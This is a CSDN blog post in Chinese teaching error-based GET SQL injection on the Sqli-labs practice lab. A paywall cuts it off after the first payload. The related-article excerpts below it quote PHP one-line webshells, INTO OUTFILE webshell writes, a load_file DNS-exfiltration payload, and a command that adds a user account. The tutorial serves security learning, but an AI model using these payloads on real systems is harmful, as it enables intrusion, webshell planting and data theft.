22-2.1 get基于报错的sql注入利用-读敏感文件和写入一句话木马

已于 2024-06-13 10:41:16 修改
阅读量256 收藏
点赞数 1
分类专栏: Web安全攻防全解析 文章标签: sql 数据库
于 2024-01-25 19:25:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/135832590
版权
本文介绍了如何利用GET方式的SQL注入漏洞,包括利用`select into outfile`或`写入一句话马`来创建WebShell,使用`load_file`读取敏感文件,以及攻击流量的分析。内容涉及Sqli-labs靶场实战,强调了攻击者需要的文件系统写入权限,并展示了注入代码的结构和功能。
摘要由CSDN通过智能技术生成

环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客 

基础:GET基于报错的sql注入利用-脱库-CSDN博客 

1、select into outfile或dumpfile 写入一句话马

这里用Sqli-labs靶场的第一关做演示,之前演示过改关卡的闭合符是单引号,靶场地址:http://127.0.0.1/sqlilabs/less-1/?id=1

判断MysQL的存储路径方便我们写入一句话马

# MySQL的@@datadir变量的值(表示数据目录的路径)
-1 union select 1,@@datadir,3 -
了解本专栏 订阅专栏 解锁全文 超级会员免费看
狗蛋的博客之旅
关注
专栏目录
订阅专栏
php mysql 注入一句话木马_渗透技术--SQL注入一句话木马原理
weixin_39800387的博客
02-19 2401
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
mysql 一句话木马_通过mysql写入一句话木马
weixin_32522079的博客
01-18 1309
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
数据库select语句写入一句话木马遇到的问题
weixin_43618066的博客
11-17 855
问题1:window服务器上,遇到了 The MySQL server is running with the --secure-file-priv option so it cannot execute this statement错误。 原因:my.ini配置文件没有secure-file-priv=,或者是secure-file-priv=NULL,有可能是secure-file-priv=某一文件路径。 解决:配置文件添加:secure-file-priv="" 问题二:linux上遇到了 Acce
SQL注入篇——一句话木马
爱国小白帽
01-08 6484
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
基于php一句话木马的变种总结
Alexz__的博客
10-10 4833
说实话php我只是在w3c系统的看了30分钟,对不是3天30天3个小时是30分钟 那我能不能说我花半个小时接通了一门计算机语言呢 (逃 需要记住的是:熟PHP手册就会有不一样的发现 贴上来的都是亲测能用 php5.4.45 apache phpstudy环境 $_GET函数数据来源的web响应木 @system($_GET['shell']) @pass...
sql注入学习
qq_42685664的博客
03-18 1696
sql注入学习
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9366
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
文件上传一句话木马getshell
qq_41620273的博客
12-25 5664
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
java一句话木马_如何使用JSP一句话木马和菜刀木
weixin_39782545的博客
02-16 4350
展开全部相信用过一句话木马的黑阔们对中国32313133353236313431303231363533e4b893e5b19e31333337393033菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使...
SQL注入与ASP木上传的又一思路.txt
07-06
·中华隐者
SQL注入】漏洞利用---取服务器敏感文件数据
最新发布
m0_57347472的博客
03-23 246
注意:load_file中写的路径名中斜杠要写双斜杠。--+是注释符(#也是sql语句中的注释符)。union select与前面查询表的列数要相同,少于前面时可以加数字来填充列。
SQL注入一句话木马(load_file/out file)
初学者L_言的博客
11-26 8866
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
PHP编程基础03---get&post 一句话木马
Z_l123的博客
12-03 3026
准备 1.下载火狐浏览器 2.安装HackBar插件 GitHub - HCTYMFF/hackbar2.1.3 下载后拖入即可 3.选择HackBar 4.关闭自动更新 get 1.编写一句话木马 <?php @eval($_GET['cmd']); ?> 2.用本机ip访问木文件并查询ipconfig 3.若查询结果出现乱码 则在php中添加 header('Content-Type:text/html;charset=gbk'); ...
sqlmap写入一句话木马
热门推荐
初学者L_言的博客
11-26 1万+
工具 靶机——metasploitable2 攻击机——kali 环境——Mutillidae 菜刀——蚁剑 主要参数 sqlmap参数: --file-read=RFILE Read a file from the back-end DBMS file system 从后端的数据库管理系统文件系统文件 --file-write=WFILE Write a ...
从一道sql注入题认识sql一句话木马
xiaolong22333的博客
12-02 624
最近做到一道题,是ctfshow平台的,题目如下 没有过滤,但如果返回结果中没有ASCII码在 00-7f 范围的,才会查询成功。我以为要用什么方法绕过,但看了师傅们的做法才知道,还可以把查询结果写到到一个文件里,而在linux服务器下web文件夹的目录为/var/www/html/ (看来我知道的还是太少了๐·°(৹˃̵﹏˂̵৹)°·๐) 所以payload为 1' union select 1,password from ctfshow_user5 into outfile '/var/www/htm
浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9968
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
数据库上传一句话木马的三种姿势
世间繁华梦一出
11-08 842
上传一句话木马的基础知识
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
SQL注入攻击详解:基于报错的GET注入技术
"本资源主要介绍了SQL注入攻击中的基于报错的一种类型,特别是针对GET请求的报错注入方法。内容涵盖了SQL注入的基本分类、GET方式下的报错注入检测与利用,以及如何使用Sqlmap工具进行漏洞测试。" 在网络安全领域,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值